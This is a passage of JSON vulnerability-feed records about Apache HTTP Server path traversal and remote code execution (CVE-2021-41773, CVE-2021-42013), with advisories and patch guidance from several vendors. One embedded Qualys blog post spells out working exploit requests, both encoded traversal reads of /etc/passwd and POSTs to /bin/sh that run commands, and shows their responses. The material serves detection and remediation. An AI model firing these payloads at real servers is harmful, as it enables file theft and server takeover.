"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-11-03T00:00:00", "id": "AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "href": "https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T02:00:34", "description": "Apache HTTPd\u662fApache\u57fa\u91d1\u4f1a\u5f00\u6e90\u7684\u4e00\u6b3e\u6d41\u884c\u7684HTTP\u670d\u52a1\u5668\u3002 \n2021\u5e7410\u67088\u65e5Apache HTTPd\u5b98\u65b9\u53d1\u5e03\u5b89\u5168\u66f4\u65b0\uff0c\u62ab\u9732\u4e86CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 \u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e\u3002\u7531\u4e8e\u5bf9CVE-2021-41773 Apache HTTPd 2.4.49 \u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e\u7684\u4fee\u590d\u4e0d\u5b8c\u5584\uff0c\u653b\u51fb\u8005\u53ef\u6784\u9020\u6076\u610f\u8bf7\u6c42\u7ed5\u8fc7\u5e03\u4e01\uff0c\u5229\u7528\u7a7f\u8d8a\u6f0f\u6d1e\u8bfb\u53d6\u5230Web\u76ee\u5f55\u4e4b\u5916\u7684\u5176\u4ed6\u6587\u4ef6\u3002\u540c\u65f6\u82e5Apache HTTPd\u5f00\u542f\u4e86cgi\u652f\u6301\uff0c\u653b\u51fb\u8005\u53ef\u6784\u9020\u6076\u610f\u8bf7\u6c42\u6267\u884c\u547d\u4ee4\uff0c\u63a7\u5236\u670d\u52a1\u5668\u3002\u963f\u91cc\u4e91\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u63d0\u9192 Apache HTTPd \u7528\u6237\u5c3d\u5feb\u91c7\u53d6\u5b89\u5168\u63aa\u65bd\u963b\u6b62\u6f0f\u6d1e\u653b\u51fb\u3002\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "attackerkb", "title": "Apache HTTPd 2.4.49/2.4.50 \u8def\u5f84\u7a7f\u8d8a\u6f0f\u6d1e", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T00:00:00", "id": "AKB:61971866-F0B5-4317-8AF4-C4E4C23279F1", "href": "https://attackerkb.com/topics/WzgBXAx8tH/apache-httpd-2-4-49-2-4-50", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-19T17:12:43", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n<https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html>\n\n \n**Recent assessments:** \n \n**noraj** at March 31, 2022 6:44pm UTC reported:\n\nQualys says:\n\n> CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n> \n> The attack in 2.4.49 initially encoded the second dot (.) to %2e and the same was double URL encoded into %%32%65 for version 2.4.50\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70", "href": "https://attackerkb.com/topics/OClg2d2nSp/cve-2021-42013-path-traversal-and-remote-code-execution-in-apache-http-server-2-4-49-and-2-4-50-incomplete-fix-of-cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:46", "description": "A directory traversal vulnerability exists in Apache HTTP Server. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "checkpoint_advisories", "title": "Apache HTTP Server Directory Traversal (CVE-2021-41773; CVE-2021-42013)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-18T00:00:00", "id": "CPAI-2021-0749", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "jvn": [{"lastseen": "2021-12-28T23:20:08", "description": "Apache HTTP Server provided by The Apache Software Foundation contains a directory traversal vulnerability (CWE-22).\n\n ## Impact\n\nA remote attacker may access the unprotected files in \"require all denied\" placed outside of the document root. \nMoreover, if CGI scripts are enabled, arbitrary code may be executed.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * Apache HTTP Server 2.4.49 and 2.4.50\nAccording to the developer, the issue is caused by insufficient fix for CVE-2021-41773. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "jvn", "title": "JVN#51106450: Apache HTTP Server vulnerable to directory traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "JVN:51106450", "href": "http://jvn.jp/en/jp/JVN51106450/index.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-11-27T06:38:53", "description": "Arch Linux Security Advisory ASA-202110-1\n=========================================\n\nSeverity: Critical\nDate : 2021-10-21\nCVE-ID : CVE-2021-42013\nPackage : apache\nType : directory traversal\nRemote : Yes\nLink : https://security.archlinux.org/AVG-2450\n\nSummary\n=======\n\nThe package apache before version 2.4.51-1 is vulnerable to directory\ntraversal.\n\nResolution\n==========\n\nUpgrade to 2.4.51-1.\n\n# pacman -Syu \"apache>=2.4.51-1\"\n\nThe problem has been fixed upstream in version 2.4.51.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives. If files outside of these directories are not protected by\nthe usual default configuration \"require all denied\", these requests\ncan succeed. If CGI scripts are also enabled for these aliased pathes,\nthis could allow for remote code execution. This issue only affects\nApache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nImpact\n======\n\nA remote attacker could trick the HTTP server into executing arbitrary\nexecutables in its file system through path traversal.\n\nReferences\n==========\n\nhttps://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013\nhttps://twitter.com/roman_soft/status/1446252280597078024\nhttps://github.com/icing/blog/blob/main/httpd-2.4.50.md\nhttps://svn.apache.org/viewvc?view=revision&revision=1893971\nhttps://security.archlinux.org/CVE-2021-42013", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T00:00:00", "type": "archlinux", "title": "[ASA-202110-1] apache: directory traversal", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T00:00:00", "id": "ASA-202110-1", "href": "https://security.archlinux.org/ASA-202110-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-10-26T20:35:58", "description": "In late September of 2021, a path traversal and file disclosure vulnerability was disclosed and reported as CVE-2021-41773 in Apache HTTP Server version 2.4.29. Both Windows and Linux servers are affected.\n\nThis vulnerability, which occurs via remote code execution (RCE), exposes a path traversal bug and allows attackers to access and read arbitrary files on the server, including sensitive system files, source code, and more. This unauthorized access could not only leak confidential user data, but could provide the information needed to plan more additional zero-day or ransomware attacks in the future and lead to a full system compromise.\n\nOn October 4th, just days after it was originally reported, Apache released a fix with an update to 2.4.50, and urged users to deploy this patch. However upon further investigation, this patch was found to be insufficient resulting in an additional patch bumping the version number to 2.4.51 on October 7th (CVE-2021-42013). It is unclear whether or not the new patch has fully corrected the vulnerability.\n\nLuckily, enterprises that have [RASP protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) installed on their servers already have protections available that prevent Path Traversal attacks, thereby safeguarding systems from vulnerabilities like CVE-2021-42013 and others like it.\n\nTo verify this protection is enabled in the suite of [RASP security protections](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>), simply navigate to the RASP Management Console and select the desired configuration file. Scroll through the various security protections until reaching the Path Traversal module, then update any settings as desired to adjust the security levels. The updated configuration file can be copied onto the server, and updated protections will be in effect within 60 seconds.\n\nRASP can also be easily installed and configured on additional devices and servers as needed to offer full protection against these vulnerabilities and hackers, as Apache recognizes these vulnerabilities are being actively exploited by bad actors.\n\nFor more information, please contact RASP Technical Support at [support@rasp.imperva.com](<mailto:support@rasp.imperva.com>) or ask for a RASP demo via <https://docs.imperva.com/bundle/rasp-overview/page/73763.htm>\n\nThe post [How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)](<https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {}, "published": "2021-10-26T19:35:24", "type": "impervablog", "title": "How RASP Protects Apache Servers from zero-day Path Traversal Attacks (CVE-2021-41773)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-26T19:35:24", "id": "IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F", "href": "https://www.imperva.com/blog/how-rasp-protects-apache-servers-from-zero-day-path-traversal-attacks-cve-2021-41773/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-11-26T18:36:54", "description": "On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted \u201cthe issue is known to be exploited in the wild\u201d and later it was identified that the vulnerability can be abused to perform remote code execution. For exploiting both the vulnerabilities Apache HTTP server must be running in non-default configuration.\n\nAs the vulnerabilities are configuration dependent, checking the version of Apache web server is not enough to identify vulnerable servers. With both the CVEs being actively exploited, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150372, 150373, 150374** which sends specially crafted HTTP request to the target server to determine if it is exploitable. Once successfully detected, users can remediate the vulnerabilities by upgrading to Apache HTTP Sever 2.4.51 or greater.\n\n### About CVE-2021-41773\n\nAccording to **CVE-2021-41773**, Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks.\n\n#### Path Traversal Analysis\n\nThe path traversal vulnerability was introduced due to the new code change added for path normalization i.e., for URL paths to remove unwanted or dangerous parts from the pathname, but it was inadequate to detect different techniques of encoding the path traversal characters "dot-dot-slash (../)"\n\nTo prevent path traversal attacks, the normalization function which is responsible to resolve URL-encoded values from the requested URI, resolved Unicode values one at a time. Hence when URL encoding the second dot as `%2e`, the logic fails to recognize `%2e` as dot thereby not decoding it, this converts the characters `../` to `.%2e/` and bypasses the check.\n\nAlong with Path traversal check bypass, for an Apache HTTP server to be vulnerable, the HTTP Server configuration should either contain the [directory directive](<https://httpd.apache.org/docs/2.4/mod/core.html#directory>) for entire server\u2019s filesystem as `Require all granted` or the directory directive should be completely missing from the configuration file.\n\n##### Vulnerable Configuration:\n \n \n <Directory />\n Require all granted\n </Directory>\n \n\nTherefore, bypassing the dot-dot check as `.%2e` and chaining it with misconfigured directory directive allows an attacker to read arbitrary files such as `passwd` from the vulnerable server file system.\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 08:13:02 GMT\n Server: Apache/2.4.49 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\nPlease note that the default configuration of Apache HTTP server has the entire filesystem directory directive configured as `Require all denied` and hence is not vulnerable.\n\n#### Remote Code Execution Analysis\n\nWhile **CVE-2021-41773** was initially documented as Path traversal and File disclosure vulnerability additional research concluded that the vulnerability can be further exploited to conduct remote code execution when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) module is enabled on the Apache HTTP server, this allows an attacker to leverage the path traversal vulnerability and call any binary on the system using HTTP POST requests.\n\n##### Configuration to enable mod_cgi module:\n \n \n <IfModule !mpm_prefork_module>\n LoadModule cgid_module modules/mod_cgid.so\n </IfModule>\n \n\nBy default the `mod_cgi` module is disabled on Apache HTTP server by commenting the above line in the configuration file. Hence, when mod_cgi is enabled and \u201cRequire all granted\u201d config is applied to the filesystem directory directive then an attacker can remotely execute commands on the Apache server. \n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: */*\n Content-Length: 7\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 09:58:23 GMT\n Server: Apache/2.4.49 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\nLooking at the HTTP POST request for RCE, we can understand `/bin/sh` is the system binary that executes the payload `echo;id` and print the output of `id` command in response.\n\n### About CVE-2021-42013\n\n**CVE-2021-42013** was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n\nThe attack in 2.4.49 initially encoded the second dot (.) to `%2e` and the same was double URL encoded into `%%32%65` for version 2.4.50\n\n##### **Encoding Analysis**\n\nConversion: dot \u2192 `%2e` \u2192 `%%32%65`\n\n * 2 is encoded to %32\n * e is encoded to %65\n * And original `%` left as it is\n\nThus a `dot` is equivalent to `%%32%65` which eventually converts `../` in double URL encode format as `%%32%65%%32%65/`\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:16:51 GMT\n Server: Apache/2.4.50 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 7\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:42:40 GMT\n Server: Apache/2.4.50 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\n### Detecting the Vulnerabilities with Qualys WAS\n\nCustomers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:\n\n * 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)\n * 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)\n * 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)\n\n\nQID 150372 \u2013 Apache HTTP Server Path Traversal (CVE-2021-41773)\n\n### Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, users shall see similar kind of results for QID 150372 in the vulnerability scan report:\n\n\n\n### Solution\n\nOrganizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade to HTTP Server 2.5.51 or later version to remediate CVE-2021-41773 & CVE-2021-42013, more information can be referred at [Apache Security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nFor maintaining best security practices, Qualys also advises users to ensure the following:\n\n * `mod_cgi` module is disabled by default unless the business requires it.\n * filesystem directory directive to be updated with `Require all denied` as show below:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\n### Credits\n\n**Apache Security advisory:**\n\n<https://httpd.apache.org/security/vulnerabilities_24.html>\n\n**CVE Details:**\n\n<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \n<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>\n\n**Credits for the vulnerability discovery go to:**\n\n * Ash Daulton along with the cPanel Security Team\n * Juan Escobar from Dreamlab Technologies\n * Fernando Mu\u00f1oz from NULL Life CTF Team\n * Shungo Kumasaka and Nattapon Jongcharoen\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1445376079548624899>\n * <https://twitter.com/hackerfantastic/status/1445529822071967745>\n * <https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>\n\n### Contributor\n\n**Jyoti Raval**, Lead Web Application Security Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T06:22:22", "type": "qualysblog", "title": "Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T06:22:22", "id": "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-11-26T18:26:07", "description": "On October 7, 2021, the Apache Software Foundation released [Apache HTTP Server version 2.4.51](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) to address Path Traversal and Remote Code Execution vulnerabilities (CVE-2021-41773, CVE-2021-42013) in Apache HTTP Server 2.4.49 and 2.4.50. These vulnerabilities have been exploited in the wild. \n\nCISA is also seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation. CISA urges organizations to [patch](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) immediately if they haven\u2019t already\u2014this cannot wait until after the holiday weekend.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 